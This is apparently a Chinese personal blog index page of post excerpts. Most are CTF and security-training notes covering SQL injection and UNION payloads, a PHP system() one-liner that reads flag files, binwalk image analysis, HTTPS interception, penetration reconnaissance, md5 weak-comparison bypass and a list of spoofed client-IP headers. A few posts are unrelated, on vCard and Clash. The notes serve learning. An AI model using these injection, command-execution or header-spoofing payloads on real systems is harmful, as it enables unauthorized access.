无星的前端之旅（二十九）——vCard电子名片

发表于 2024-07-05 更新于 2024-11-05 分类于前端阅读次数：
本文字数： 534 阅读时长 ≈ 1 分钟

背景

最近同事给我发了一张“电子名片”

照片上有一个二维码

大伙可以用微信扫这个二维码看看

看看是不是很有意思

其实非常简单

大家只要搜索vCard

就能找到这个标准格式

不过标准都有点麻烦

阅读全文 »

赣银杯赛前培训

发表于 2024-06-26 更新于 2024-11-05 分类于安全阅读次数：
本文字数： 5.4k 阅读时长 ≈ 5 分钟

SQL注入

select password from users where id = "xiaoming"

select password from users where id = "" or 1=1#" 

information_schema

	schemata	tables	columns
数据库名	schema_name
表名	table_schema	table_name
字段名	table_schema	table_name	column_name

nianji

liuyi

name

1	select name from nianji.liuyi;

联合注入

1	select id,username,password from users union select 1,2,3;


1	xiaoming	xiaoming
1	2	3

阅读全文 »

无星的安全之旅（九）——WebCheckList

发表于 2024-06-25 更新于 2024-11-05 分类于安全阅读次数：
本文字数： 81 阅读时长 ≈ 1 分钟

1. 啥提示都没有

既然是web，那就dirsearch扫一下先

2. php的命令调用

1	<?php system("cat /f*");?>

阅读全文 »

无星的渗透之旅速成篇（四）-记录checklist

发表于 2024-06-06 更新于 2024-11-05 分类于安全阅读次数：
本文字数： 0 阅读时长 ≈ 1 分钟

Clash代理游戏

发表于 2024-05-25 更新于 2024-11-05 分类于 clash 阅读次数：
本文字数： 481 阅读时长 ≈ 1 分钟

1.下载TUN插件

阅读全文 »

无星的安全之旅（八）——图片

发表于 2024-05-20 更新于 2024-11-05 分类于安全阅读次数：
本文字数： 98 阅读时长 ≈ 1 分钟

实不相瞒，看到图片我就头痛

现在看到图片

我上去第一件事

你这玩意是不是塞了什么小玩具

打开kali

1	binwalk ~/1.png

康康里面是不是塞了什么

1	binwalk ~/1.png -e

分离图片

剩下的再看

阅读全文 »

无星的渗透之旅速成篇（一）-https抓包

发表于 2024-05-07 更新于 2024-11-05 分类于安全阅读次数：
本文字数： 2k 阅读时长 ≈ 2 分钟

背景

抓包很常见，以前做开发的时候也经常用

无论是charles还是finddler等等

你是否遇到过https一篇红和unkown的情况？

2024年了，都是https了把，http屈指可数

那么我们如何抓包https呢

证书

其实说白了，证书才是关键

我们抓包的本质，是将网络请求代理到某个软件上

换句话说，自己当“中间人”

阅读全文 »

无星的渗透之旅速成篇（二）-打点

发表于 2024-05-07 更新于 2024-11-05 分类于安全阅读次数：
本文字数： 2.4k 阅读时长 ≈ 2 分钟

阿星还是个新人

不知道正确的渗透步骤是什么

这里看到一个打点步骤

遂记录下来

打点的基本方法

基本方法，无非就是信息搜集–>找到脆弱资产–>漏洞利用→getshell，说起来是很简单的。

这其中最肝的一个部分，莫过于信息搜集了，纯体力活。

当然，过程可以用工具相对优化，但我依旧认为是最无脑的一个部分，就像大学生和小学生（高阶和低阶技术人员）一起用计算器（各种工具 fofa goby oneforall等）来算1w道加减乘除题（大量的资产域名子域名 c段等）一样，其实是区分不开技术人员的水平的，很多头部的公司早就认识到了这一点，于是在大型攻防演练中，通常是派大量的人来进行资产收集，然后筛选出其中的脆弱资产后把资产给后续的利用人员来进内网快速拿分。

虽然信息搜集很无脑，但是该说还是得说，这个事情一般有以下几个步骤。

1、当项目经理告诉了你攻击目标的时候 →得到公司名→上企查查搜公司名→搜出来一堆公司和子公司

阅读全文 »

无星的安全之旅（七）——md5绕过

发表于 2024-04-17 更新于 2024-11-05 分类于安全阅读次数：
本文字数： 5.5k 阅读时长 ≈ 5 分钟

md5绕过

php的代码审计总有这种比较，记录一下

php中的强弱比较（和js挺像的）

强比较

强比较（全等比较符===）：强比较要求比较的两个值不仅是值相等，而且类型也必须相等。只有当值和类型都相等时，才会返回 true。

<?php
$a = 5;
$b = "5";

if ($a === $b) {
  echo "相等";
} else {
// 输出这行
  echo "不相等";
}

?>

php中的弱比较

弱比较（相等比较符==）：弱比较只要求比较的两个值在转换类型后相等即可。如果两个值的类型不同，会尝试将其中一个值转换为另一个值的类型。例如：

<?php
$a = 5;
$b = "5";

if ($a == $b) {
  //输出这行
  echo "相等";
} else {
  echo "不相等";
}
?>

上述代码中，比较结果相等，由于 $b 是字符串类型，因此 $a 将被自动转换为字符串类型后再进行比较。

阅读全文 »

无星的BUU之旅——BUU BURP COURSE 1

发表于 2023-12-17 分类于安全阅读次数：
本文字数： 558 阅读时长 ≈ 1 分钟

只能本地访问

X-Forwarded-For:127.0.0.1
 
X-Forwarded:127.0.0.1
 
Forwarded-For:127.0.0.1
 
Forwarded:127.0.0.1
 
X-Forwarded-Host:127.0.0.1
 
X-remote-IP:127.0.0.1
 
X-remote-addr:127.0.0.1
 
True-Client-IP:127.0.0.1
 
X-Client-IP:127.0.0.1
 
Client-IP:127.0.0.1
 
X-Real-IP:127.0.0.1
 
Ali-CDN-Real-IP:127.0.0.1
 
Cdn-Src-Ip:127.0.0.1
 
Cdn-Real-Ip:127.0.0.1
 
CF-Connecting-IP:127.0.0.1
 
X-Cluster-Client-IP:127.0.0.1
 
WL-Proxy-Client-IP:127.0.0.1
 
Proxy-Client-IP:127.0.0.1
 
Fastly-Client-Ip:127.0.0.1
 
True-Client-Ip:127.0.0.1

Host: 127.0.0.1

阅读全文 »